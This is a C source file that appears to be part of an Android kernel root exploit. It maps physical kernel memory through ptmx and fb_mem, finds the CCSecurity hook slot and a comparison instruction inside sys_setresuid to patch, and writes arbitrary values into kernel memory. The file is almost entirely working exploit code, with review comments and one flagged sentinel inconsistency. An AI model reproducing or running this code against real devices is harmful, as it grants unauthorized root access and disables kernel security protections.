/*
 * Establish a user-space view of kernel memory and record its base in
 * kernel_mapped_address.
 *
 * Two back-ends are tried in order: ptmx_map_memory() at the fixed address
 * PTMX_MEMORY_MAPPED_ADDRESS, then the fb_mem route, whose mapping base is
 * kept in fb_mem_mmap_base and whose descriptor in fb_mmap_fd.
 * kernel_physical_offset is resolved lazily through setup_variables().
 *
 * Globals written: fb_mmap_fd, kernel_mapped_address, fb_mem_mmap_base.
 * Returns true when either back-end produced a mapping; false when the
 * offset could not be set up or both back-ends failed (fb_mmap_fd is left
 * at -1 in that case).
 *
 * NOTE(review): this fb_mem path treats a NULL result as failure, while the
 * other fb_mem_mmap() callers in this file compare against MAP_FAILED —
 * confirm which sentinel fb_mem_mmap() actually returns.
 */
bool
map_kernel_memory(void)
{
  if (kernel_physical_offset == 0 && !setup_variables()) {
    return false;
  }

  fb_mmap_fd = -1;

  /* First choice: the ptmx-backed mapping at a fixed address. */
  kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;
  if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
    return true;
  }

  /* Fallback: fb_mem mapping. The 0x8000 adjustment matches the other
   * fb_mem callers in this file; its meaning is not visible here. */
  fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);

  printf("Attempt fb_mem_exploit...\n");
  fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);
  if (!fb_mem_mmap_base) {
    fb_mmap_fd = -1;
    return false;
  }

  kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
  return true;
}
/*
 * Locate, inside the mapped copy of the ccsecurity_ops structure, the slot
 * that holds one of the __ccs_search_binary_handler addresses.
 *
 * Symbol addresses come from the kallsyms_in_memory_* lookups; the candidate
 * list returned by kallsyms_in_memory_lookup_names() is NULL-terminated and
 * is freed here before returning. Only the first 0x100 bytes of the mapped
 * structure are scanned.
 *
 * Returns a pointer into the mmap'd region at the matching slot, or NULL if
 * either lookup fails or no candidate is found.
 */
static void*
find_ccs_search_binary_handler_address_in_ccsecurity_ops(void *mmap_base_address)
{
  unsigned long int ccsecurity_ops = kallsyms_in_memory_lookup_name("ccsecurity_ops");
  if (!ccsecurity_ops) {
    return NULL;
  }

  unsigned long int *candidates = kallsyms_in_memory_lookup_names("__ccs_search_binary_handler");
  if (!candidates) {
    return NULL;
  }

  void *mapped_ops = fb_mem_convert_to_mmaped_address((void*)ccsecurity_ops, mmap_base_address);
  void *match = NULL;

  /* Stop at the first candidate whose value appears in the scanned window. */
  for (size_t idx = 0; candidates[idx] != 0; idx++) {
    match = memmem(mapped_ops, 0x100, &candidates[idx], sizeof candidates[idx]);
    if (match) {
      break;
    }
  }

  free(candidates);
  return match;
}
/*
 * Run callback_func over the fb_mem view of the kernel image.
 *
 * When the kernel physical offset is known, fb_mem is pointed at it (less
 * 0x8000, as the other fb_mem callers in this file do). A mapping is made,
 * the callback receives the mapped equivalent of PAGE_OFFSET, KERNEL_SIZE
 * and callback_param, and the mapping is released before returning.
 *
 * Returns false if fb_mem_mmap() yields MAP_FAILED; otherwise the
 * callback's own result.
 */
static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
  unsigned long int phys_offset = get_kernel_physical_offset();
  if (phys_offset != 0) {
    fb_mem_set_kernel_phys_offset(phys_offset - 0x8000);
  }

  int fb_fd;
  void *mapped = fb_mem_mmap(&fb_fd);
  if (mapped == MAP_FAILED) {
    return false;
  }

  void *kernel_view = fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, mapped);
  bool ok = callback_func(kernel_view, KERNEL_SIZE, callback_param);

  /* Always release the mapping, whatever the callback reported. */
  fb_mem_munmap(mapped, fb_fd);
  return ok;
}
/*
 * Find the cmp_operation_code byte pattern inside the mapped copy of
 * sys_setresuid, scanning the first 0x100 bytes of the function.
 *
 * Returns a pointer into the mmap'd region, or NULL if the sys_setresuid
 * address cannot be obtained (a message including strerror(errno) is
 * printed) or the pattern is not present.
 *
 * NOTE(review): errno is only meaningful in that message if
 * get_sys_setresuid_address_in_memory() sets it on failure — confirm.
 */
static void*
find_cmp_operation_address_in_sys_setresuid(void *mmap_base_address)
{
  unsigned long int setresuid_addr = get_sys_setresuid_address_in_memory(mmap_base_address);
  if (setresuid_addr == 0) {
    printf("Failed to get sys_setresuid address due to %s\n", strerror(errno));
    return NULL;
  }

  void *mapped_setresuid = fb_mem_convert_to_mmaped_address((void*)setresuid_addr, mmap_base_address);
  return memmem(mapped_setresuid, 0x100, &cmp_operation_code, sizeof cmp_operation_code);
}
/*
 * Store a single int at a kernel address through a temporary fb_mem mapping.
 *
 * The mapping is created with fb_mem_mmap(), `address` is translated into
 * the mapped view, the value is written, and the mapping is torn down.
 * Nothing here checks that the translated address lies inside the mapping;
 * the caller is responsible for passing an address fb_mem covers.
 *
 * Returns false only if fb_mem_mmap() returns MAP_FAILED.
 */
bool
fb_mem_write_value_at_address(unsigned long int address, int value)
{
  int fb_fd;
  void *mapped = fb_mem_mmap(&fb_fd);
  if (mapped == MAP_FAILED) {
    return false;
  }

  int *target = (int *)fb_mem_convert_to_mmaped_address((void*)address, mapped);
  *target = value;

  fb_mem_munmap(mapped, fb_fd);
  return true;
}